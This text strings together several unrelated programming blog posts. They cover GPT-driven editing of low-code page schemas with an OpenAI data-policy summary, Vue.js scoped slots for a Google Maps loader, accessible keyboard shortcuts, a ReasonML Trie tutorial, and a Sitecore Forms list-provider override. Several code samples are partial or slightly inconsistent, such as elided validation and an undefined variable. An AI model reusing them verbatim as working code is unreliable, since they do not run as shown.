This article takes natural-language page building on a low-code platform as its example: it helps users describe, in natural language, the pages they want to build or modify, then uses GPT to edit the configuration file that describes the page, and renders a live preview for the user from the returned content.

Usage

The OpenAI invocation component:

const { Configuration, OpenAIApi } = require("openai");
const openai = new OpenAIApi(new Configuration({ /** OpenAI configuration */ }));
const distance = require('compute-cosine-distance');
const knowledge: { text: string, embedding: string, d?: number }[] = require("./knowledge")

export default function OpenAI (input, schema) {
  return new Promise(async (resolve, reject) => {
    // Convert the user's request into an embedding
    const embedding = await openai.createEmbedding({
      model: "text-embedding-ada-002",
      input,
    }).then((response) => response.data.data[0].embedding);

    // Rank the knowledge chunks by their relevance to the user's request
    for (const row of knowledge) {
      row.d = distance(JSON.parse(row.embedding), embedding)
    }
    knowledge.sort((a, b) => a.d - b.d);

    // Send the relevant knowledge, the original code and the user's request to the GPT-3.5 model
    const message = await openai.createChatCompletion({
      model: "gpt-3.5-turbo",
      messages: [
        {
          role: 'system',
          content: "You are a programming assistant. Read the protocol knowledge and modify the code according to the user's request.\n\n" +
            "Protocol knowledge:\n\n" +
            knowledge.slice(0, 10).map((row) => row.text).join("\n\n") + "\n\n" +
            "Original code:\n\n" +
            "```\n" + schema + "\n```"
        },
        { role: 'user', content: input }
      ]
    }).then((response) => response.data.choices[0].message.content);

    // Check whether the returned message contains Markdown code fences
    let startIndex = message.indexOf('```');
    if (message.substring(startIndex + 3, startIndex + 7) === 'json') {
      startIndex += 4;
    }
    if (startIndex > -1) {
      // The response is Markdown; every code block has to be checked
      let endIndex = message.indexOf('```', startIndex + 3);
      let messageConfig;
      while (endIndex > -1) {
        try {
          messageConfig = message.substring(startIndex + 3, endIndex);
          if ( /** validate messageConfig */ ) {
            resolve(messageConfig);
            break;
          }
        } catch (e) { /* this block failed, try the next one */ }
        startIndex = message.indexOf('```', endIndex + 3);
        if (message.substring(startIndex + 3, startIndex + 7) === 'json') {
          startIndex += 4;
        }
        if (startIndex === -1) {
          reject(['Unrecognized response from OpenAI:', message]);
          break;
        }
        endIndex = message.indexOf('```', startIndex + 3);
      }
    } else {
      // The response may be the code itself
      try {
        const messageConfig = message;
        if ( /** validate messageConfig */ ) {
          resolve(messageConfig);
        } else {
          reject(['Unrecognized response from OpenAI:', message]);
        }
      } catch (e) {
        reject(['Unrecognized response from OpenAI:', message]);
      }
    }
  })
}

The low-code renderer:

import React, { useState, useEffect } from 'react'
import { CCMS } from 'ccms-antd'
import OpenAI from './OpenAI'

export default function App () {
  const [ ready, setReady ] = useState(true)
  const [ schema, setSchema ] = useState({})

  const handleOpenAI = (input) => {
    OpenAI(input, schema).then((nextSchema) => {
      setReady(false)
      setSchema(nextSchema)
    })
  }

  useEffect(() => {
    setReady(true)
  }, [schema])

  return (
    <div style={{ width: '100vw', height: '100vh' }}>
      {ready && (
        <CCMS
          config={pageSchema}
          /** ... */
        />
      )}
      <div style={{ position: 'fixed', right: 385, bottom: 20, zIndex: 9999 }}>
        <Popover
          placement="topRight"
          trigger="click"
          content={
            <Form.Item label="Build pages with OpenAI:" labelCol={{ span: 24 }}>
              <Input.TextArea
                placeholder="Type your request here and press Shift+Enter to confirm."
                defaultValue={defaultPrompt}
                onPressEnter={(e) => {
                  if (e.shiftKey) {
                    handleOpenAI(e.currentTarget.value)
                  }
                }}
              />
            </Form.Item>
          }
        >
          <Button shape="circle" type="primary" icon={ /** OpenAI icon */ } />
        </Popover>
      </div>
    </div>
  )
}
IV. Information security

According to OpenAI's privacy policy, when data is accessed through the API:

1. Unless explicitly authorized, OpenAI does not use the data users send to train or improve its models.
2. Data sent by users is retained by OpenAI for 30 days for abuse monitoring and review. (A limited number of authorized OpenAI employees, plus specialized third-party contractors bound by confidentiality and security obligations, can access this data.)
3. Files uploaded by users (including the training data submitted when fine-tuning a model) are retained until the user deletes them.

In addition, OpenAI does not offer private deployment of its models (including the custom models produced by the fine-tuning approach above), but dedicated private capacity can be purchased through its sales team.

The training data, private framework knowledge and low-code framework used in this article all come from work our team has developed and open-sourced. Users are also shown data-security notices when they use the related services.
Using Scoped Slots in Vue.js to Abstract Functionality

Let's start with a short introduction to the Vue.js slots concept. Slots are useful when you want to inject content in a specific place of a component. Those specific places that you can define are called slots.

For example, you want to create a wrapper component that is styled in a specific way but you want to be able to pass any content to be rendered inside that wrapper (it might be a string, a computed value, or even another component).

There are three types of slots:

• default / unnamed slots: used when you have a single slot in a component. We create them by adding <slot> in the template where we want to be able to inject our content. This <slot> tag will be replaced with any content passed to the component's template. (A minimal sketch of this case follows after this list.)
• named slots: used when you have multiple slots in a component and we want to inject different content in different places (slots). We create those by adding <slot> with a name attribute (e.g. <slot name="header"></slot>). Then when we render our component, we provide a slot content for each named slot by adding a slot attribute with the slot name.

<base-layout>
  <template slot="header">
    <h1>My awesome header</h1>
  </template>
  <template slot="footer">
    <p>My awesome footer</p>
  </template>
</base-layout>

By doing that, the <slot> tags in the component will be replaced by content passed to the component.

• scoped slot: used when you want a template inside a slot to access data from the child component that renders the slot content. This is particularly useful when you need freedom in creating custom templates that use the child component's data properties.

[diagram: scoped slots]
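For the first case, a minimal sketch of a default slot (my illustration, with a made-up BaseWrapper component, not from the article):

<!-- BaseWrapper.vue -->
<template>
  <div class="wrapper">
    <!-- replaced by whatever content the parent passes in -->
    <slot></slot>
  </div>
</template>

<!-- usage -->
<base-wrapper>
  <p>Any content, even another component.</p>
</base-wrapper>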
Real-World Example: Creating a Google Map Loader component

Imagine a component that configures and prepares an external API to be used in another component, but is not tightly coupled with any specific template. Such a component could then be reused in multiple places rendering different templates but using the same base object with a specific API.

I've created a component (GoogleMapLoader.vue) that:

1. initializes the Google Maps API
2. creates google and map objects
3. exposes those objects to the parent component in which the GoogleMapLoader is used

Below is an example of how this can be achieved. We will analyze the code piece-by-piece and see what is actually happening in the next section.

Let's first establish our GoogleMapLoader.vue template:

<template>
  <div>
    <div class="google-map" data-google-map></div>
    <template v-if="Boolean(this.google) && Boolean(this.map)">
      <slot :google="google" :map="map" />
    </template>
  </div>
</template>

Now, our script needs to pass some props to the component which allows us to set the Google Maps API and Map object:

import GoogleMapsApiLoader from "google-maps-api-loader";

export default {
  props: {
    mapConfig: Object,
    apiKey: String
  },
  data() {
    return {
      google: null,
      map: null
    };
  },
  async mounted() {
    const googleMapApi = await GoogleMapsApiLoader({
      apiKey: this.apiKey
    });
    this.google = googleMapApi;
    this.initializeMap();
  },
  methods: {
    initializeMap() {
      const mapContainer = this.$el.querySelector("[data-google-map]");
      this.map = new this.google.maps.Map(mapContainer, this.mapConfig);
    }
  }
};

This is just part of a working example. You can dive deeper into this example.

OK, now that we have our use case set up, let's move onto breaking that code down to explore what it's doing.

1. Create a component that initializes our map

In the template, we create a container for the map which will be used to mount the Map object extracted from the Google Maps API.

// GoogleMapLoader.vue
<template>
  <div>
    <div class="google-map" data-google-map></div>
  </div>
</template>

Next up, our script needs to receive props from the parent component which will allow us to set the Google Map. Those props consist of:

• mapConfig: Google Maps config object
• apiKey: Our personal api key required by Google Maps

// GoogleMapLoader.vue
import GoogleMapsApiLoader from "google-maps-api-loader";

export default {
  props: {
    mapConfig: Object,
    apiKey: String
  },

Then, we set the initial values of google and map to null:

  data() {
    return {
      google: null,
      map: null
    };
  },

On the mounted hook, we create an instance of googleMapApi and the map object from it. We also need to set the values of google and map to the created instances:

  async mounted() {
    const googleMapApi = await GoogleMapsApiLoader({
      apiKey: this.apiKey
    });
    this.google = googleMapApi;
    this.initializeMap();
  },
  methods: {
    initializeMap() {
      const mapContainer = this.$el.querySelector("[data-google-map]");
      this.map = new this.google.maps.Map(mapContainer, this.mapConfig);
    }
  }
};

So far, so good. With all that done, we could continue adding the other objects to the map (Markers, Polylines, etc.) and use it as an ordinary map component.

But, we want to use our GoogleMapLoader component only as a loader that prepares the map; we don't want to render anything on it.

To achieve that, we need to allow the parent component that will use our GoogleMapLoader to access this.google and this.map that are set inside the GoogleMapLoader component. That's where scoped slots really shine. Scoped slots allow us to expose the properties set in a child component to the parent component. It may sound like an inception, but bear with me one more minute as we break that down further.

2. Create component that uses our initializer component

In the template, we render the GoogleMapLoader component and pass props that are required to initialize the map.

// TravelMap.vue
<template>
  <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey" />
</template>

Our script tag should look like this:

import GoogleMapLoader from "./GoogleMapLoader";
import { mapSettings } from "@/constants/mapSettings";

export default {
  components: {
    GoogleMapLoader,
  },
  computed: {
    mapConfig() {
      return {
        ...mapSettings,
        center: { lat: 0, lng: 0 }
      };
    },
  }
};

Still no scoped slots, so let's add one.

3. Expose google and map properties to the parent component by adding a scoped slot

Finally, we can add a scoped slot that will do the job and allow us to access the child component props in the parent component. We do that by adding the <slot> tag in the child component and passing the props that we want to expose (using the v-bind directive or the :propName shorthand). It does not differ from passing the props down to the child component, but doing it in the <slot> tag will reverse the direction of data flow.

// GoogleMapLoader.vue
<template>
  <div>
    <div class="google-map" data-google-map></div>
    <template v-if="Boolean(this.google) && Boolean(this.map)">
      <slot :google="google" :map="map" />
    </template>
  </div>
</template>

Now, when we have the slot in the child component, we need to receive and consume the exposed props in the parent component.
4. Receive exposed props in the parent component using the slot-scope attribute

To receive the props in the parent component, we declare a template element and use the slot-scope attribute. This attribute has access to the object carrying all the props exposed from the child component. We can grab the whole object or we can de-structure that object and take only what we need. Let's de-structure this thing to get what we need.

// TravelMap.vue
<template>
  <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey">
    <template slot-scope="{ google, map }">
      {{ map }}
      {{ google }}
    </template>
  </GoogleMapLoader>
</template>

Even though the google and map props do not exist in the TravelMap scope, the component has access to them and we can use them in the template.

Yeah, OK, but why would I do things like that? What is the use of all that?

Glad you asked! Scoped slots allow us to pass a template to the slot instead of a rendered element. It's called a scoped slot because it will have access to certain child component data even though the template is rendered in the parent component scope. That gives us the freedom to fill the template with custom content from the parent component.

5. Create factory components for Markers and Polylines

Now, when we have our map ready, we will create two factory components that will be used to add elements to the TravelMap.

// GoogleMapMarker.vue
import { POINT_MARKER_ICON_CONFIG } from "@/constants/mapSettings";

export default {
  props: {
    google: {
      type: Object,
      required: true
    },
    map: {
      type: Object,
      required: true
    },
    marker: {
      type: Object,
      required: true
    }
  },
  mounted() {
    new this.google.maps.Marker({
      position: this.marker.position,
      marker: this.marker,
      map: this.map,
      icon: POINT_MARKER_ICON_CONFIG
    });
  },
};

// GoogleMapLine.vue
import { LINE_PATH_CONFIG } from "@/constants/mapSettings";

export default {
  props: {
    google: {
      type: Object,
      required: true
    },
    map: {
      type: Object,
      required: true
    },
    path: {
      type: Array,
      required: true
    }
  },
  mounted() {
    new this.google.maps.Polyline({
      path: this.path,
      map: this.map,
      ...LINE_PATH_CONFIG
    });
  },
};

Both of these receive google, which we use to extract the required object (Marker or Polyline), as well as map, which gives us a reference to the map on which we want to place our element.

Each component also expects an extra prop to create a corresponding element. In this case, we have marker and path, respectively.

On the mounted hook, we create an element (Marker/Polyline) and attach it to our map by passing the map property to the object constructor.

There's still one more step to go...

6. Add elements to the map

Let's use our factory components to add elements to our map. We must render the factory component and pass the google and map objects so data flows to the right places.

We also need to provide the data that's required by the element itself. In our case, that's the marker object with the position of the marker and the path object with Polyline coordinates.
Here we go, integrating the data points directly into the template:

// TravelMap.vue
<template>
  <GoogleMapLoader
    :mapConfig="mapConfig"
    apiKey="yourApiKey"
  >
    <template slot-scope="{ google, map }">
      <GoogleMapMarker
        v-for="marker in markers"
        :key="marker.id"
        :marker="marker"
        :google="google"
        :map="map"
      />
      <GoogleMapLine
        v-for="line in lines"
        :key="line.id"
        :path.sync="line.path"
        :google="google"
        :map="map"
      />
    </template>
  </GoogleMapLoader>
</template>

We need to import the required factory components in our script and set the data that will be passed to the markers and lines:

import GoogleMapLoader from "./GoogleMapLoader";
import GoogleMapMarker from "./GoogleMapMarker";
import GoogleMapLine from "./GoogleMapLine";
import { mapSettings } from "@/constants/mapSettings";

export default {
  components: {
    GoogleMapLoader,
    GoogleMapMarker,
    GoogleMapLine
  },
  data() {
    return {
      markers: [
        { id: "a", position: { lat: 3, lng: 101 } },
        { id: "b", position: { lat: 5, lng: 99 } },
        { id: "c", position: { lat: 6, lng: 97 } }
      ],
      lines: [
        { id: "1", path: [{ lat: 3, lng: 101 }, { lat: 5, lng: 99 }] },
        { id: "2", path: [{ lat: 5, lng: 99 }, { lat: 6, lng: 97 }] }
      ]
    };
  },
  computed: {
    mapConfig() {
      return {
        ...mapSettings,
        center: this.mapCenter
      };
    },
    mapCenter() {
      return this.markers[1].position;
    }
  }
};

And we're done! With all those bits and pieces completed, we can now re-use the GoogleMapLoader component as a base for all our maps by passing a different template to each one of them. Imagine that you need to create another map with different Markers, or just Markers without Polylines. By using the scoped-slots pattern this becomes very easy, since all we now need to pass to the GoogleMapLoader component is different content.

This pattern is not strictly tied to Google Maps; it can be used with any library to set up a base component and expose the library's API, which can then be used in the component that summoned the base component. It might be tempting to create a more complex or robust solution, but this gets us the abstraction we need, and it becomes an independent piece of our codebase. If we get to that point, then it might be worth considering extracting it into an add-on.
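For instance, a markers-only map (a sketch of ours, not from the original article, with a made-up component name) just passes different slot content to the same loader:

// CityMarkersMap.vue (hypothetical)
<template>
  <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey">
    <template slot-scope="{ google, map }">
      <GoogleMapMarker
        v-for="marker in markers"
        :key="marker.id"
        :marker="marker"
        :google="google"
        :map="map"
      />
    </template>
  </GoogleMapLoader>
</template>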
✎ Technique: Character key shortcuts

If keyboard shortcuts are implemented using only letter (including upper- and lower-case letters), punctuation, number, or symbol characters, provide a way to turn off or remap the character key shortcuts:

• Turn off: a mechanism is available to turn the shortcut off;
• Remap: a mechanism is available to remap the shortcut to use one or more non-printable keyboard keys (e.g. Ctrl, Alt);
• Active only on focus: the keyboard shortcut for a user interface component is only active when that component has focus.

If you provide character key shortcuts, provide a way to turn them off and a way to remap them. When remapping, allow users to assign one or more characters to the shortcut.

(Source: Knowbility article on character key shortcuts)
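A minimal JavaScript sketch of these mechanisms (this example is ours, not from the source article; the settings flags and the #search element are assumptions):

// "Turn off" and "remap" switches; in a real page these would be user settings.
let shortcutsEnabled = true;  // Turn off: disable all character key shortcuts
let requireModifier = false;  // Remap: also require a non-printable key (Ctrl)

document.addEventListener("keydown", (event) => {
  if (!shortcutsEnabled) return;

  // Single-character shortcuts must never fire while the user is typing.
  const t = event.target;
  if (t.tagName === "INPUT" || t.tagName === "TEXTAREA" || t.isContentEditable) return;

  // Honour the remap: once enabled, plain "s" no longer triggers anything.
  if (requireModifier && !event.ctrlKey) return;

  if (event.key === "s") {
    event.preventDefault();
    document.querySelector("#search").focus(); // assumes a #search input exists
  }
});

The third option, "active only on focus", amounts to attaching the keydown listener to the component itself rather than to document.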
Trieng out ReasonML and ReasonReact

The title seems a little weird and looks like a typo, but there is a pun intended here: the "Trie" in "Trieng" stands for the Trie data structure. In this blog post we'll explore the world of ReasonML by taking the example of a Trie and implementing a React app in ReasonReact. I wrote this post to serve as an introduction to ReasonML and to the Trie data structure, which I have been playing around with for the last couple of months.

What is ReasonML?

Reason, or ReasonML, is not a new language; it is a new syntax powered by the ecosystem of OCaml, a battle-tested functional programming language from 1996. The ReasonML code that we write can be compiled to JavaScript, which can be run in the browser and in Node.js, using the BuckleScript compiler. Reason's creator also created ReactJS, whose first prototypes were written in SML, a distant cousin of OCaml.

What does this have to do with Functional Programming?

Functional programming is a programming paradigm in which the focus is on transforming data by applying functions. A function can be thought of as a computation that maps input of a particular type/structure to output of a different type/structure. Functional programming builds on principles like immutability, scopes and closures, recursion, and programming without side effects. A side effect occurs when a function changes a value other than its own output, for example mutating the state of a global variable from inside a function. Mutating data is a taboo in functional programming.

Functional programming languages can be loosely classified into two families:

1. The LISP family
2. The ML family

LISP family languages: LISP family languages are dynamically typed, and their syntax contains a lot of parentheses. The popular LISP dialects in use these days are Clojure, Common Lisp, and Scheme. LISP uses a special kind of syntax called S-expressions, with prefix notation. One of the good books to learn about LISP is SICP (Structure and Interpretation of Computer Programs).

ML family languages: ML family languages are statically and strongly/gradually typed; they make use of the Hindley-Milner type system, which allows the compiler to infer types when they are not explicitly provided in the code. The ML family languages have some great features like pattern matching and currying. Popular languages from the ML family are Haskell, OCaml, SML (Standard ML), and F#.

ReasonML belongs to the ML family of languages, and it also provides syntax for imperative programming when we can't think of a functional implementation (yes, ReasonML allows mutation, and for and while loops).

What is a Data Structure?

A data structure can be thought of as an API which allows certain operations and guarantees some time and space complexity for these operations. For example, a Set data structure can be implemented using a HashTable or a HashMap: as long as we are able to guarantee uniqueness of values and find values in O(1), we are good to go.

A Trie is also called a prefix tree, because we store prefixes in a tree-like structure. A Trie is a multi-way tree data structure, i.e. one node can have multiple children.

Let's take the example of searching through a list of words/sentences (strings). This can be implemented naively using an array or a list, but for fast prefix lookup we can use a Trie; a quick sketch of the naive approach follows.
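Here is what the naive version might look like in ReasonML (a sketch of ours, not code from the original post):

/* Naive prefix search over a plain list: every query walks all n strings
   and compares up to m characters of each one. */
let findAllWithPrefix = (words: list(string), prefix: string) =>
  List.filter(word => Js.String.startsWith(prefix, word), words);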
Naive implementation (list of strings):

  Operation         Time complexity                 Space complexity
  Insert            O(1)                            O(n*m)
  Delete            O(n*m) + O(n) (find + delete)   NA
  Find              O(n*m)                          NA
  Find All Prefix   O(n*m)                          NA

  (n = number of strings, m = length of the string/prefix)

Trie implementation:

  Operation         Time complexity                 Space complexity
  Insert            O(m)                            O(n*m)
  Delete            O(m)                            NA
  Find              O(m)                            NA
  Find All Prefix   O(n) + O(m)                     NA

  (n = number of strings, m = length of the string/prefix)

So a Trie is faster than a list implementation for this problem. The only downside: a Trie takes more space in memory, as it stores data in the form of nodes, and a node takes up more memory than a character. Also, strings are stored as sequences of characters in adjacent memory locations, so they can take advantage of the hardware cache during lookups (in the case of a Trie there is a high chance of a cache miss during memory location lookups).

Enough with the theory; let's get started with some code. I have implemented the Trie data structure in ReasonML and used it to build a demo of filtering through a list of strings in ReasonReact (a React library implemented in ReasonML).

You can check out the code here: https://github.com/melwyn95/Trie-ReasonML/blob/master/src/Trie.re
You can play around with the demo here: https://melwyn95.github.io/Trie-ReasonML/

The Trie node and operations have the following signatures:

[Image: Type signatures for the Trie node and operations]

ReasonML language features

1. ReasonML's type system and compiler: ReasonML's type system is complete and "sound", and type coverage is always 100%. Types can be inferred by the compiler: the type system deduces the types for you even if you don't manually write them down.

2. Record types: you can define your own types in ReasonML like this:

type person = {
  age: int,
  name: string,
};

Records in ReasonML are like JavaScript objects, but:

• lighter
• immutable by default
• fixed in field names and types
• very fast
• a bit more rigidly typed

3. Variant types:

[Image: Variant type]

In functional programming there is a concept of polymorphic types, known by many names: enums, sum types, algebraic data types. A variant type allows us to define multiple specific constructors of a type. In the above example, the type action has 3 constructors, which are used to define the operations taking place on the front-end: when the page is initialised we dispatch an action of type Init; when we search for something in the list, an action of type Search is dispatched; and when we want to add something to the trie, we dispatch Add. For more about variant types, refer to: https://reasonml.github.io/docs/en/variant

4. Destructuring and Pattern Matching: destructuring is a syntax through which we can extract fields from a data structure without using the dot operator. It is a visually concise way of extracting fields. Example:

type person = {
  name: string,
  age: int,
};

let somePerson = { name: "Guy", age: 30 };
let { name, age } = somePerson;

Pattern matching is like destructuring, but it works with variant types. It is used with the switch expression, which forces you to handle all the cases of a variant type.

[Image: Pattern matching]
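The two code screenshots above did not survive extraction, so here is a small reconstruction of what they likely showed, based on the surrounding prose (the constructor payloads and the findPrefixRoot/listAllWords helpers follow the description but are our guesses):

/* The action variant described above: one constructor per front-end operation. */
type action =
  | Init
  | Search(string)
  | Add(string);

/* Pattern matching with switch: the compiler insists that every
   constructor of the option variant is handled. */
let findWords = (root, prefix) =>
  switch (findPrefixRoot(root, prefix)) {
  | None => []
  | Some(prefixRoot) => listAllWords(prefixRoot)
  };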
In the example above, the findPrefixRoot function returns an option type of node: if the prefix is found in the trie, it returns Some(node); otherwise it returns None. The option type is a special variant type provided in the ReasonML standard library. It has the type definition:

type option('a) = Some('a) | None;

Here 'a is like a generic; it is replaced by the type we specify. So, in the example above, we have to handle both cases for the option type returned by the findPrefixRoot function. If None is returned, there is no node in the Trie that matches the specified prefix, so we return an empty list ([]). If Some(prefixRoot) is returned, we need to find all the words starting from the prefix root.

5. Currying and Partial Application of functions: currying is a nice feature that functional languages provide. In simple words: unless a function is provided with all the arguments it needs, the function is not executed; instead, it returns intermediate functions to which we can pass the remaining arguments. All functions in ReasonML are auto-curried, and the process of creating intermediate functions from a curried function is called partial application. Example:

let add = (x, y) => x + y;
let addFive = add(5);
let eleven = addFive(6);
let twelve = addFive(7);

Here add is a function which is auto-curried, and we create a new function called addFive by partially applying 5 as a parameter to add. Then, when we call addFive with the parameters 6 and 7, we get 11 and 12 respectively. Internally, add is represented as:

let add = x => y => x + y;

6. Mutation in ReasonML: mutation is generally discouraged in functional programming, but sometimes it is helpful for optimizing performance. ReasonML provides mutative programming capabilities through ref():

[Image: Mutation using ref()]

let bindings are immutable, but you can wrap a value with a ref, which is like a box whose content can change. In the above example I have wrapped a list in a ref; to mutate the value of the list we have to use the := operator, and to access the value inside the ref we use the ^ operator. The listAllWords function could have been written in a functional way, but I wrote it using mutation just to explore the concept.

Bonus: Making an API call in ReasonReact

[Image: API call using Fetch]

For working with API calls and JSON we need to use BuckleScript libraries like bs-fetch and bs-json. I used references from Stack Overflow and the ReasonML forums to make the above code work. I don't completely understand how it works, but it works; it also reminds me that I'm not done learning ReasonML, and that there is lots of stuff still to be learnt and understood.

I hope this blog post inspires you to learn ReasonML and ReasonReact. If you have made it this far, thanks for reading and !!!Happy Hacking!!!

References / Resources:

1. You can start by watching this video; it is 5½ hours long, but it will cover all the basic stuff you need to get started with ReasonML.
2. The official documentation of ReasonML is really helpful when dealing with modules, Functors, and Promises.
3. For ReasonReact, refer to the official site. It has the commands to get started with a demo project, and the demo project has nice examples.
4. Finally, one last resource: the online book on ReasonML by Dr. Axel Rauschmayer. It covers all the basic concepts and touches upon some advanced ones.
Allow Text for Empty List Items from Dynamic Datasources in Sitecore Experience Forms

Last week, when building a form in Sitecore Experience Forms, I noticed that you cannot associate text with an empty list option for List fields. For example, suppose you have a Dropdown List field where you want the first option to read "Please select blah blah blah": you cannot do this, as the "out of the box" (OOTB) feature for adding an empty list option does not let you associate text with it, nor can you have an empty Value field on an Item when using a Dynamic datasource.

Let me create a dummy form to illustrate the issue (no, I'm not calling you a dummy 😉 ). Let's have fun with donuts! Suppose we have the following donut items in a folder somewhere which will be used as list options in a Dropdown List field in Forms:

We also have one which will serve as the top option telling the user to choose a donut:

Well, OOTB, this Item with an empty Value field will not be an option in my field:

Sure, you might say "Hey Mike, you can associate empty options in these fields by setting the 'Empty list item at top of list' property setting in Forms." Yes, you can do that, but you cannot associate text with that empty option:

That's no good!

Well, after some digging, I discovered the service Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider in Sitecore.ExperienceForms.Mvc.dll, which seemed like a good place to look (I've mentioned before that virtually everything in Sitecore Experience Forms is in the Sitecore IoC, so you should have a look at /sitecore/admin/showservicesconfig.aspx when looking to customize it). When I looked at this interface's implementation, Sitecore.ExperienceForms.Mvc.DataSource.ListDataSourceProvider, I noticed that ListFieldItem instances (a POCO which represents options for List fields on Forms) are only added when their Value properties aren't null or empty, so I decided to customize this to allow those which have empty Value properties but not empty Text properties.

The following solution does just that.

I first created the following POCO class to contain any hardcoded string values I saw in the OOTB service (please don't hardcode things, as you won't be invited to parties if you do so 😉 ). An instance of this class will be hydrated from values housed in a Sitecore configuration file further down in this post:

namespace Sandbox.Foundation.Form.Models.Mvc.Datasource
{
    public class ListDataSourceProviderSettings
    {
        public string ListDelimiters { get; set; }
    }
}

I then created the following configurator to hydrate the POCO instance above from the Sitecore configuration file further down.
I ultimately stick this instance into the Sitecore IoC as a singleton so I can inject it into any service classes that need it:

using System;
using Microsoft.Extensions.DependencyInjection;
using Sitecore.Abstractions;
using Sitecore.DependencyInjection;
using Sandbox.Foundation.Form.Models.Mvc.Datasource;

namespace Sandbox.Foundation.Form
{
    public class ListDataSourceFieldsConfigurator : IServicesConfigurator
    {
        public void Configure(IServiceCollection serviceCollection)
        {
            serviceCollection.AddSingleton(CreateListDataSourceProviderSettings);
        }

        private ListDataSourceProviderSettings CreateListDataSourceProviderSettings(IServiceProvider provider)
            => CreateConfigObject<ListDataSourceProviderSettings>(provider, "moduleSettings/foundation/form/listDataSourceProviderSettings");

        private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class
            => GetService<BaseFactory>(provider).CreateObject(path, true) as TConfigObject;

        private TService GetService<TService>(IServiceProvider provider)
            => provider.GetService<TService>();
    }
}

Next, I created the following class to replace the OOTB one:

using System.Collections.Generic;
using System.Linq;
using Sitecore.Data.Items;
using Sitecore.ExperienceForms.Mvc.DataSource;
using Sitecore.ExperienceForms.Mvc.Models;
using Sitecore.ExperienceForms.Mvc.Pipelines;
using Sandbox.Foundation.Form.Models.Mvc.Datasource;

namespace Sandbox.Foundation.Form.Services.Mvc.Datasource
{
    public class AllowEmptyValuesListDataSourceProvider : ListDataSourceProvider
    {
        private readonly ListDataSourceProviderSettings _settings;
        private readonly IFormBuilderContext _formBuilderContext;
        private readonly IListItemParser _listItemParser;

        public AllowEmptyValuesListDataSourceProvider(ListDataSourceProviderSettings settings, IFormBuilderContext formBuilderContext, IListItemParser listItemParser)
            : base(formBuilderContext, listItemParser)
        {
            _settings = settings;
            _listItemParser = listItemParser;
        }

        public override IEnumerable<ListFieldItem> GetListItems(string dataSource, string displayFieldName, string valueFieldName, string defaultSelection)
        {
            IEnumerable<Item> items = GetDataItems(dataSource);
            if (items == null || !items.Any())
            {
                return CreateEmptyListFieldItemCollection();
            }

            IList<ListFieldItem> options = CreateNewListFieldItemList();
            if (options == null)
            {
                return CreateEmptyListFieldItemCollection();
            }

            IEnumerable<string> itemsToSelect = GetItemsToSelect(defaultSelection);
            foreach (Item item in items)
            {
                ListFieldItem listFieldItem = ParseListFieldItem(item, displayFieldName, valueFieldName);
                if (listFieldItem == null || string.IsNullOrWhiteSpace(listFieldItem.Text))
                {
                    continue;
                }

                SetSelected(itemsToSelect, listFieldItem);
                options.Add(listFieldItem);
            }

            return options;
        }

        protected virtual IEnumerable<ListFieldItem> CreateEmptyListFieldItemCollection() => CreateEmptyCollection<ListFieldItem>();

        protected virtual IList<ListFieldItem> CreateNewListFieldItemList() => CreateNewList<ListFieldItem>();

        protected virtual IList<TObject> CreateNewList<TObject>() => new List<TObject>();

        protected virtual IEnumerable<string> GetItemsToSelect(string itemsToSelect)
        {
            char[] delimiters = GetListDelimiters();
            if (string.IsNullOrWhiteSpace(itemsToSelect) || !HasAny(delimiters))
            {
                return CreateEmptyCollection<string>();
            }

            return itemsToSelect.Split(delimiters);
        }

        protected virtual char[] GetListDelimiters()
        {
            if (string.IsNullOrWhiteSpace(_settings.ListDelimiters))
            {
                return CreateEmptyCollection<char>().ToArray();
            }

            return _settings.ListDelimiters.ToCharArray();
        }
        protected virtual IEnumerable<TObject> CreateEmptyCollection<TObject>() => Enumerable.Empty<TObject>();

        protected virtual ListFieldItem ParseListFieldItem(Item item, string displayFieldName, string valueFieldName) => _listItemParser.Parse(item, displayFieldName, valueFieldName);

        protected virtual void SetSelected(IEnumerable<string> itemsToSelect, ListFieldItem listFieldItem)
        {
            if (!HasAny(itemsToSelect) || string.IsNullOrWhiteSpace(listFieldItem?.ItemId))
            {
                return;
            }

            listFieldItem.Selected = ShouldSelect(itemsToSelect, listFieldItem);
        }

        protected virtual bool ShouldSelect(IEnumerable<string> itemsToSelect, ListFieldItem listFieldItem) => ContainsValue(itemsToSelect, listFieldItem?.ItemId);

        protected virtual bool ContainsValue(IEnumerable<string> items, string value) => HasAny(items) && !string.IsNullOrWhiteSpace(value) && items.Contains(value);

        protected virtual bool HasAny<TObject>(IEnumerable<TObject> collection) => collection != null && collection.Any();
    }
}

I'm not going to go much into how this class works, as I think you should read it over a few times to discover for yourself how it works. Ultimately, it will add ListFieldItem instances with empty Value properties, but skip those with empty Text properties.

I then tied it all together using the following Sitecore configuration file:

<?xml version="1.0"?>
<configuration xmlns:patch="http://www.sitecore.net/xmlconfig/" xmlns:env="http://www.sitecore.net/xmlconfig/env">
  <sitecore>
    <moduleSettings>
      <foundation>
        <form>
          <listDataSourceProviderSettings type="Sandbox.Foundation.Form.Models.Mvc.Datasource.ListDataSourceProviderSettings, Sandbox.Foundation.Form" singleInstance="true">
            <ListDelimiters>|</ListDelimiters>
          </listDataSourceProviderSettings>
        </form>
      </foundation>
    </moduleSettings>
    <services>
      <configurator type="Sandbox.Foundation.Form.ListDataSourceFieldsConfigurator, Sandbox.Foundation.Form"/>
      <register serviceType="Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider, Sitecore.ExperienceForms.Mvc">
        <patch:attribute name="implementationType">Sandbox.Foundation.Form.Services.Mvc.Datasource.AllowEmptyValuesListDataSourceProvider, Sandbox.Foundation.Form</patch:attribute>
      </register>
    </services>
  </sitecore>
</configuration>

One thing to note: I'm replacing the OOTB service with my custom one above under /services/register[@serviceType='Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider, Sitecore.ExperienceForms.Mvc'].

After doing a build and deploy of my solution locally, I reloaded the Forms Builder/designer page. As you can see, my empty-valued option with text now displays:

Yep, it was fixed. Yes, you can have your donut and eat it too. 😉

Until next time, keep on Sitecoring. Oh, and Happy Holidays as well!

Service Locate or Create Objects Defined in a Fully Qualified Type Name Field in Sitecore

<TL;DR>

This is, without a doubt, the longest blog post I have ever written (and hopefully will ever write, as it nearly destroyed me 😉 ), so I will distill the main points in this TL;DR synopsis.

